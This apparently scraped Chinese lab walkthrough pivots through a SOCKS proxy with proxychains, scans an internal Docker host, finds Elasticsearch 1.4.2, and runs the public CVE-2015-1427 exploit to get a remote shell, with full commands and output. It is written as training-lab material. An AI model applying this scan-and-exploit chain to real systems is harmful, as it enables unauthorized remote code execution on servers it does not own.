- 首页 > 生活 > >
- 发现与我们之前的目标容器非常相似,我们可以使用 firefox 设置代理访问
http://172.17.0.1:5000 浏览器代理方法自行百度,重点使用手动配置代理配置 SOCKS 主机 与前面 proxychains.conf 一致 - 访问网页的结果与之前的相同,可以判断
172.17.0.1 便是之前 192.168.56.101 的宿主机
测试探索
172.17.0.2
┌──(kali?kali)-[~/Workspace]└─$ proxychains4 -f ./proxychains.conf nmap -Pn -sT -sV 172.17.0.2130 ?[proxychains] config file found: ./proxychains.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.16Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-19 20:39 CST[proxychains] Strict chain...192.168.56.103:1080...172.17.0.2:1720 <--denied[proxychains] Strict chain...192.168.56.103:1080...172.17.0.2:1025 <--denied......[proxychains] Strict chain...192.168.56.103:1080...172.17.0.2:9200...OK[proxychains] Strict chain...192.168.56.103:1080...172.17.0.2:9200...OKNmap scan report for 172.17.0.2Host is up (0.0066s latency).Not shown: 999 closed tcp ports (conn-refused)PORTSTATE SERVICE VERSION9200/tcp openhttpElasticsearch REST API 1.4.2 (name: Watcher; cluster: elasticsearch; Lucene 4.10.2)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 29.58 seconds- 发现新线索,
172.17.0.2 的 9200 端口开启,运行服务 Elasticsearch REST API 1.4.2 (name: Watcher; cluster: elasticsearch; Lucene 4.10.2) 说明:Elasticsearch 是位于 Elastic Stack 核心的分布式搜索和分析引擎
- 此处我们可以使用
searchsploit 查询 Elasticsearch 相关漏洞并尝试,攻入其中
──(kali?kali)-[~/Workspace]└─$ searchsploit Elasticse130 ?----------------------------------------------------------------------------------------- ---------------------------------Exploit Title|Path----------------------------------------------------------------------------------------- ---------------------------------ElasticSearch - Remote Code Execution| linux/remote/36337.pyElasticSearch - Remote Code Execution| multiple/webapps/33370.htmlElasticSearch - Search Groovy Sandbox Bypass (Metasploit)| java/remote/36415.rbElasticSearch 1.6.0 - Arbitrary File Download| linux/webapps/38383.pyElasticSearch 7.13.3 - Memory disclosure| multiple/webapps/50149.pyElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal| php/webapps/37054.pyElasticSearch Dynamic Script - Arbitrary Java Execution (Metasploit)| java/remote/33588.rbElasticsearch ECE 7.13.3 - Anonymous Database Dump| multiple/webapps/50152.py----------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results - 尝试一个
/usr/share/exploitdb/exploits/linux/remote/36337.py 但注意是否安装 python2 以及其 requests 如果没有使用以下代码
sudo apt-get install python2# 安装 python2wget https://bootstrap.pypa.io/pip/2.7/get-pip.py && python2 get-pip.py# 安装 python2 的 pip2 如果有就跳过此步python2 -m pip install requests# 安装 requests 包proxychains4 -f ./proxychains.conf python2 /usr/share/exploitdb/exploits/linux/remote/36337.py 172.17.0.2# 利用 36337.py 脚本进入其中
──(kali?kali)-[~/Workspace]└─$ proxychains4 -f ./proxychains.conf python2 36337.py 172.17.0.2[proxychains] config file found: ./proxychains.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.16▓███████▓▄▄▄██████ ▄▄▄█████▓ ██▓ ▄████▄████████? ██ ▓███████▓██▓▓█? ▓██??████▄?██? ▓██? ▓?▓██??██? ?█?██? ▓██? ██?▓█? ▓██?▓██??███?██??██?█▄? ▓██▄? ▓██? ???██??▓█▄ ? ▓██▄?██??██??███?██??██??▓█▄ ?██??██▄▄▄▄██?██?? ▓██▓ ? ?██??▓▓▄ ▄██??██??▓█ ?██ ?▓█▄ ?██??██???████??██████?▓█▓██??██████???██? ? ?██?? ▓███? ??██████???▓█??██▓??████??██████??██████??? ?? ?? ??▓???▓?█?? ?▓? ? ?? ???▓? ?? ??? ?▓? ? ? ? ??????? ?? ?? ??▓?? ??▓?? ??? ? ?? ??? ?? ??? ??? ???? ??? ? ? ??? ? ? ??? ? ??? ? ???? ???????? ???????? ??? ?? ?????????? ????????????Exploit for ElasticSearch , CVE-2015-1427Version: 20150309.1{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something~$
经验总结扩展阅读
-
-
2023年12月17日适合剃头吗 2023年12月剃头吉日一览表
-
-
紫薇命盘,2020年2月7日——正月十四适合什么属相的人结婚?
-
洗面奶 “洗面奶”查出致癌物!你的日用款上黑名单了吗?
-
洗护品|别再瞧不起“国货”了,这款国货洗护品,别看价格低,却真心好用
-
-
-
-
-
-
-
-
-
领蔚生物|干细胞是肺纤维化的“清道夫”,是肺损伤患者的福音
-
-
-
-
-
